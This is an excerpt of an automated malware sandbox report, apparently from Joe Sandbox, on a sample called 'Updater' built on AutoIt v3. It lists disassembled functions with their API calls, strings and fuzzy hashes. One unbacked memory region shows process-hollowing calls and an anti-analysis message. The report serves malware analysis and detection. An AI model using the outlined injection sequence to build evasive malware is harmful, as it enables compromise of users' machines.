                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess$CountTick$Message
                                                                                                  • String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
                                                                                                  • API String ID: 2713535555-1661097759
                                                                                                  • Opcode ID: 5e03d1ad98a0a88319701ce69aab4846dc2edaa1434c0bd2e8d402dc565e4ad8
                                                                                                  • Instruction ID: f8e76eb59711f01e9bb91cabf9b451e10500b56bc39110efc5ca6bcc3a1efc7d
                                                                                                  • Opcode Fuzzy Hash: 5e03d1ad98a0a88319701ce69aab4846dc2edaa1434c0bd2e8d402dc565e4ad8
                                                                                                  • Instruction Fuzzy Hash: 5712FF70A00219AFEB50DBA9CCC1FDEBBF4AB58705F10409AE604E72E1D774AA448F71

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 561 6e3998-6e39ad 562 6e39af-6e39b2 561->562 563 6e3a0d-6e3a0f 561->563 564 6e39b4-6e39bb 562->564 565 6e3a13 562->565 563->562 566 6e3a11 563->566 567 6e3a8d-6e3a95 PostQuitMessage 564->567 568 6e39c1-6e39c6 564->568 570 7280b1-7280d9 call 6dad2c call 6dad46 565->570 571 6e3a19-6e3a1e 565->571 569 6e39f8-6e3a00 DefWindowProcW 566->569 576 6e3a41-6e3a43 567->576 572 6e39cc-6e39d0 568->572 573 72811e-728132 call 73cde4 568->573 575 6e3a06-6e3a0c 569->575 607 7280de-7280e5 570->607 577 6e3a45-6e3a6c SetTimer RegisterWindowMessageW 571->577 578 6e3a20-6e3a23 571->578 579 6e39d6-6e39db 572->579 580 6e3a97-6e3aa1 call 6e3619 572->580 573->576 598 728138 573->598 576->575 577->576 581 6e3a6e-6e3a79 CreatePopupMenu 577->581 584 728052-728055 578->584 585 6e3a29-6e3a3c KillTimer call 6e35b3 call 6e514d 578->585 587 728103-72810a 579->587 588 6e39e1-6e39e6 579->588 600 6e3aa6 580->600 581->576 592 728057-72805b 584->592 593 72808d-7280ac MoveWindow 584->593 585->576 587->569 595 728110-728119 call 731bdd 587->595 596 6e39ec-6e39f2 588->596 597 6e3a7b-6e3a8b call 6e36c0 588->597 601 72807c-728088 SetFocus 592->601 602 72805d-728060 592->602 593->576 595->569 596->569 596->607 597->576 598->569 600->576 601->576 602->596 603 728066-728077 call 6dad2c 602->603 603->576 607->569 611 7280eb-7280fe call 6e35b3 call 6e34c7 607->611 611->569
                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006E3992,?,?), ref: 006E3A00
                                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,006E3992,?,?), ref: 006E3A2C
                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006E3A4F
                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006E3992,?,?), ref: 006E3A5A
                                                                                                  • CreatePopupMenu.USER32 ref: 006E3A6E
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 006E3A8F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                  • String ID: TaskbarCreated$p)z$p)z$p)z$p)z$p)z
                                                                                                  • API String ID: 129472671-3383597985
                                                                                                  • Opcode ID: b45cf93f5f906760fca7e3def4a5aa4e80d5d35e1e2c5aba8b190813c1878a39
                                                                                                  • Instruction ID: 69863cc7db3bfd0e2f27f37bae6e2c955c422b186f6add9bec02061b6fe1d958
                                                                                                  • Opcode Fuzzy Hash: b45cf93f5f906760fca7e3def4a5aa4e80d5d35e1e2c5aba8b190813c1878a39
                                                                                                  • Instruction Fuzzy Hash: 924148306053A4AADF251F3D9C0DBB93A57E742300F008238F542973A2DABD9E43875A

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 006D1155: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 006D1173
                                                                                                    • Part of subcall function 006EFD48: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006E0F35), ref: 006EFD6A
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006E0F78
                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00726FEF
                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00727030
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00727072
                                                                                                  • _wcslen.LIBCMT ref: 007270D9
                                                                                                  • _wcslen.LIBCMT ref: 007270E8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$p3z$|(z
                                                                                                  • API String ID: 98802146-1549078497
                                                                                                  • Opcode ID: 4874865a02226c8d05a1c0cb973df24c48580c0a273bed1a3657b99e000ce412
                                                                                                  • Instruction ID: 37bf0b9c6ce4f42d10aa050c07316d3a7887068fd25b1cfd9d7467890be9718b
                                                                                                  • Opcode Fuzzy Hash: 4874865a02226c8d05a1c0cb973df24c48580c0a273bed1a3657b99e000ce412
                                                                                                  • Instruction Fuzzy Hash: C671A071909301AECB14EF65EC4186BBBE9FF8A740F40842EF545C72A0EB74DA48CB59

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 006E50AD
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 006E50D7
                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006E50E8
                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 006E5105
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006E5115
                                                                                                  • LoadIconW.USER32(000000A9), ref: 006E512B
                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006E513A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                  • Opcode ID: 1f8e513ddffc624e03ef8fa9177ccf455e39c12c3dcd68f4a293758fe94ac13e
                                                                                                  • Instruction ID: 59159dda0f373da838b374b13c95f6467da919f3b4366f143a12a916d1a95aa1
                                                                                                  • Opcode Fuzzy Hash: 1f8e513ddffc624e03ef8fa9177ccf455e39c12c3dcd68f4a293758fe94ac13e
                                                                                                  • Instruction Fuzzy Hash: 9C210BB1E15318EFDB10DF98EC88BDDBBB4FB09710F00811AF911A62A0D7B949459F99

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 752 149f141-149f155 753 149f161-149f167 752->753 754 149f169-149f16c 753->754 755 149f16e-149f173 753->755 754->755 756 149f157-149f15f CharNextA 754->756 757 149f182-149f18a 755->757 758 149f175-149f17b 755->758 756->753 760 149f1e7-149f1ec 757->760 758->757 759 149f17d-149f180 758->759 759->753 761 149f18c-149f191 760->761 762 149f1ee-149f20b call 14a0a59 760->762 764 149f1d3-149f1e5 CharNextA 761->764 765 149f193-149f19d CharNextA 761->765 770 149f288-149f28d 762->770 764->760 766 149f1b3-149f1b9 765->766 768 149f1bb-149f1be 766->768 769 149f1c0-149f1c5 766->769 768->769 771 149f19f-149f1b1 CharNextA 768->771 769->760 772 149f1c7-149f1d1 CharNextA 769->772 773 149f20d-149f212 770->773 774 149f293-149f2a4 770->774 771->766 772->760 775 149f264-149f272 CharNextA 773->775 776 149f214-149f21e CharNextA 773->776 775->770 777 149f274-149f286 775->777 778 149f244-149f24a 776->778 777->770 777->777 779 149f24c-149f24f 778->779 780 149f251-149f256 778->780 779->780 781 149f220-149f22e CharNextA 779->781 780->770 782 149f258-149f262 CharNextA 780->782 781->778 783 149f230-149f242 781->783 782->770 783->778 783->783
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(00000000), ref: 0149F196
                                                                                                  • CharNextA.USER32(00000000,00000000), ref: 0149F1A2
                                                                                                  • CharNextA.USER32(00000000,00000000), ref: 0149F1CA
                                                                                                  • CharNextA.USER32(00000000), ref: 0149F1D6
                                                                                                  • CharNextA.USER32(?,00000000), ref: 0149F217
                                                                                                  • CharNextA.USER32(00000000,?,00000000), ref: 0149F223
                                                                                                  • CharNextA.USER32(00000000,?,00000000), ref: 0149F25B
                                                                                                  • CharNextA.USER32(?,00000000), ref: 0149F267
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID: $"$"
                                                                                                  • API String ID: 3213498283-938660540
                                                                                                  • Opcode ID: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
                                                                                                  • Instruction ID: cc14cca4207827632179c4163ea9c81d33dd8077ad36dcc1cea7ee3af8e67680
                                                                                                  • Opcode Fuzzy Hash: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
                                                                                                  • Instruction Fuzzy Hash: 5851EDB4A042819FDB21DFACC484A56BFE5EF6A350B74089EE4D5CB361D735AC44CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 784 710585-7105b5 call 710359 787 7105d0-7105dc call 70504f 784->787 788 7105b7-7105c2 call 7026b9 784->788 794 7105f5-71063e call 7102c4 787->794 795 7105de-7105f3 call 7026b9 call 7026cc 787->795 793 7105c4-7105cb call 7026cc 788->793 802 7108a7-7108ad 793->802 804 710640-710649 794->804 805 7106ab-7106b4 GetFileType 794->805 795->793 809 710680-7106a6 GetLastError call 702696 804->809 810 71064b-71064f 804->810 806 7106b6-7106e7 GetLastError call 702696 CloseHandle 805->806 807 7106fd-710700 805->807 806->793 823 7106ed-7106f8 call 7026cc 806->823 814 710702-710707 807->814 815 710709-71070f 807->815 809->793 810->809 811 710651-71067e call 7102c4 810->811 811->805 811->809 817 710713-710761 call 704f98 814->817 816 710711 815->816 815->817 816->817 826 710771-710795 call 710077 817->826 827 710763-71076f call 7104d5 817->827 823->793 834 710797 826->834 835 7107a8-7107eb 826->835 827->826 833 710799-7107a3 call 7084de 827->833 833->802 834->833 837 7107ed-7107f1 835->837 838 71080c-71081a 835->838 837->838 839 7107f3-710807 837->839 840 710820-710824 838->840 841 7108a5 838->841 839->838 840->841 843 710826-710859 CloseHandle call 7102c4 840->843 841->802 846 71085b-710887 GetLastError call 702696 call 705161 843->846 847 71088d-7108a1 843->847 846->847 847->841
                                                                                                  APIs
                                                                                                    • Part of subcall function 007102C4: CreateFileW.KERNELBASE(00000000,00000000,?,0071062E,?,?,00000000,?,0071062E,00000000,0000000C), ref: 007102E1
                                                                                                  • GetLastError.KERNEL32 ref: 00710699
                                                                                                  • __dosmaperr.LIBCMT ref: 007106A0
                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 007106AC
                                                                                                  • GetLastError.KERNEL32 ref: 007106B6
                                                                                                  • __dosmaperr.LIBCMT ref: 007106BF
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007106DF
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00710829
                                                                                                  • GetLastError.KERNEL32 ref: 0071085B
                                                                                                  • __dosmaperr.LIBCMT ref: 00710862
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                  • String ID: H
                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                  • Opcode ID: 51a014026c8db23bf8f066d944fbba8bf68e405181a49a987ab1fc6e731674d5
                                                                                                  • Instruction ID: 7e11d678847baefe1ad86a9d662cbf100e2b7d91835f373204fcdabb27a3ff93
                                                                                                  • Opcode Fuzzy Hash: 51a014026c8db23bf8f066d944fbba8bf68e405181a49a987ab1fc6e731674d5
                                                                                                  • Instruction Fuzzy Hash: 26A12432A14254DFDF19EF6CC855BEE3BE1AB46320F140149F8119B2D2DBB99C92CB91

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 006E2C5C
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 006E2C6B
                                                                                                  • LoadIconW.USER32(00000063), ref: 006E2C81
                                                                                                  • LoadIconW.USER32(000000A4), ref: 006E2C93
                                                                                                  • LoadIconW.USER32(000000A2), ref: 006E2CA5
                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006E2CBD
                                                                                                  • RegisterClassExW.USER32(?), ref: 006E2D0E
                                                                                                    • Part of subcall function 006E507A: GetSysColorBrush.USER32(0000000F), ref: 006E50AD
                                                                                                    • Part of subcall function 006E507A: RegisterClassExW.USER32(00000030), ref: 006E50D7
                                                                                                    • Part of subcall function 006E507A: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006E50E8
                                                                                                    • Part of subcall function 006E507A: InitCommonControlsEx.COMCTL32(?), ref: 006E5105
                                                                                                    • Part of subcall function 006E507A: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006E5115
                                                                                                    • Part of subcall function 006E507A: LoadIconW.USER32(000000A9), ref: 006E512B
                                                                                                    • Part of subcall function 006E507A: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006E513A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                  • API String ID: 423443420-4155596026
                                                                                                  • Opcode ID: 7272235264c5691a55e6087e1eec5e3e8c5f14313bbb82ae0db308880ba23f44
                                                                                                  • Instruction ID: 81cc693961f0d8b2c3bf2e3f86c451fadd1c8bfb11df374efa39f72d22a6decf
                                                                                                  • Opcode Fuzzy Hash: 7272235264c5691a55e6087e1eec5e3e8c5f14313bbb82ae0db308880ba23f44
                                                                                                  • Instruction Fuzzy Hash: 9121FF70E11314AFDF109FA9EC45B99BFB5FB8A710F00802AF505A62A1D7BE0951CF99

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006EFA2C
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006EFA34
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006EFA3F
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006EFA4A
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000011,00000000), ref: 006EFA52
                                                                                                    • Part of subcall function 006EF9FB: MapVirtualKeyW.USER32(00000012,00000000), ref: 006EFA5A
                                                                                                    • Part of subcall function 006EF508: RegisterWindowMessageW.USER32(00000004,?,006D93EB), ref: 006EF560
                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006D9488
                                                                                                  • OleInitialize.OLE32 ref: 006D94A6
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00718D75
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                  • String ID: <%z$`(z$x$z$%z$&z
                                                                                                  • API String ID: 1986988660-2065116488
                                                                                                  • Opcode ID: 01e9702062aaeb2835f6dbbb43adad4bbc39a2704f7ec06ae0b772d4128454d6
                                                                                                  • Instruction ID: 614db80c20a72f1948a581570a5ddd8175e471b0048bb86664af1226ef8e5c27
                                                                                                  • Opcode Fuzzy Hash: 01e9702062aaeb2835f6dbbb43adad4bbc39a2704f7ec06ae0b772d4128454d6
                                                                                                  • Instruction Fuzzy Hash: 08716CB0D112408F8798EF7DA8696153AE1BBCB301310C6BAA409C7663EB7C49679F5D

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 914 708b75-708b85 915 708b87-708b9a call 7026b9 call 7026cc 914->915 916 708b9f-708ba1 914->916 932 708f21 915->932 918 708ba7-708bad 916->918 919 708f09-708f16 call 7026b9 call 7026cc 916->919 918->919 922 708bb3-708bde 918->922 937 708f1c call 702610 919->937 922->919 925 708be4-708bed 922->925 928 708c07-708c09 925->928 929 708bef-708c02 call 7026b9 call 7026cc 925->929 930 708f05-708f07 928->930 931 708c0f-708c13 928->931 929->937 936 708f24-708f29 930->936 931->930 935 708c19-708c1d 931->935 932->936 935->929 939 708c1f-708c36 935->939 937->932 942 708c53-708c5c 939->942 943 708c38-708c3b 939->943 947 708c7a-708c84 942->947 948 708c5e-708c75 call 7026b9 call 7026cc call 702610 942->948 945 708c45-708c4e 943->945 946 708c3d-708c43 943->946 949 708cef-708d09 945->949 946->945 946->948 951 708c86-708c88 947->951 952 708c8b-708ca9 call 70282e call 7027f4 * 2 947->952 980 708e3c 948->980 953 708ddd-708de6 call 70f74c 949->953 954 708d0f-708d1f 949->954 951->952 983 708cc6-708cec call 709254 952->983 984 708cab-708cc1 call 7026cc call 7026b9 952->984 967 708de8-708dfa 953->967 968 708e59 953->968 954->953 957 708d25-708d27 954->957 957->953 961 708d2d-708d53 957->961 961->953 965 708d59-708d6c 961->965 965->953 970 708d6e-708d70 965->970 967->968 973 708dfc-708e0b GetConsoleMode 967->973 972 708e5d-708e75 ReadFile 968->972 970->953 975 708d72-708d9d 970->975 977 708ed1-708edc GetLastError 972->977 978 708e77-708e7d 972->978 973->968 979 708e0d-708e11 973->979 975->953 982 708d9f-708db2 975->982 985 708ef5-708ef8 977->985 986 708ede-708ef0 call 7026cc call 7026b9 977->986 978->977 987 708e7f 978->987 979->972 988 708e13-708e2d ReadConsoleW 979->988 981 708e3f-708e49 call 7027f4 980->981 981->936 982->953 994 708db4-708db6 982->994 983->949 984->980 991 708e35-708e3b call 702696 985->991 992 708efe-708f00 985->992 986->980 998 708e82-708e94 987->998 989 708e4e-708e57 988->989 990 708e2f GetLastError 988->990 989->998 990->991 991->980 992->981 994->953 1001 708db8-708dd8 994->1001 998->981 1005 708e96-708e9a 998->1005 1001->953 1009 708eb3-708ebe 1005->1009 1010 708e9c-708eac call 708891 1005->1010 1012 708ec0 call 7089e1 1009->1012 1013 708eca-708ecf call 7086d1 1009->1013 1019 708eaf-708eb1 1010->1019 1020 708ec5-708ec8 1012->1020 1013->1020 1019->981 1020->1019
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 61f6791c1126c29da583dfb47ca80bc49ad9805b2f7c29162d672022162b7538
                                                                                                  • Instruction ID: 136bb85f2d785067ceac1a99f8dade2248ca2580cfad3a8f48feede48e831c64
                                                                                                  • Opcode Fuzzy Hash: 61f6791c1126c29da583dfb47ca80bc49ad9805b2f7c29162d672022162b7538
                                                                                                  • Instruction Fuzzy Hash: 6FC1E471E04249EFDB519FA8C848BAE7BF0AF1A300F144285E590A73D2CB7C9941CB62

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • MessageBoxA.USER32(00000000,Executing manually will not work,014B9E79,00000000), ref: 014B9C3A
                                                                                                  • MessageBoxA.USER32(00000000,no data,014B9E79,00000000), ref: 014B9CB2
                                                                                                  • GetTickCount.KERNEL32 ref: 014B9D4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$CountTick
                                                                                                  • String ID: Executing manually will not work$no data$nznddeJq
                                                                                                  • API String ID: 1431039135-3900826401
                                                                                                  • Opcode ID: ba9ddbaba8c6f1da3b7920d470e1522cf7a8449f8c371189517d7bcf8584973f
                                                                                                  • Instruction ID: d6f0223c5079992ff1f59f43900527221c11c97a3bbc4b6ca1a20fafc72d6308
                                                                                                  • Opcode Fuzzy Hash: ba9ddbaba8c6f1da3b7920d470e1522cf7a8449f8c371189517d7bcf8584973f
                                                                                                  • Instruction Fuzzy Hash: A36107786452068FCB20EB66D4C0ECD77B5FB79324F61452AEA00973B8CB74AC06CB61
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006EFBE5
                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006EFC06
                                                                                                  • ShowWindow.USER32(00000000), ref: 006EFC1A
                                                                                                  • ShowWindow.USER32(00000000), ref: 006EFC23
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShow
                                                                                                  • String ID: AutoIt v3$edit
                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                  • Opcode ID: a95fb0200788cffb7c063cf292b34e4a6f14419cf2ded3bccb9cafcf8d9d3982
                                                                                                  • Instruction ID: 1ea16bb15e523dcbaae9d1257eabee88b1ec3c7cc2d1dbccbc7ac69715668ff1
                                                                                                  • Opcode Fuzzy Hash: a95fb0200788cffb7c063cf292b34e4a6f14419cf2ded3bccb9cafcf8d9d3982
                                                                                                  • Instruction Fuzzy Hash: 99F0DA71A403947AEE31171B6C48E376EBDD7CBF51B00806EF900A21B1D5AD0852DAB9
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,014B6DCD,00000001,00000000,00000000,00000000), ref: 014B2999
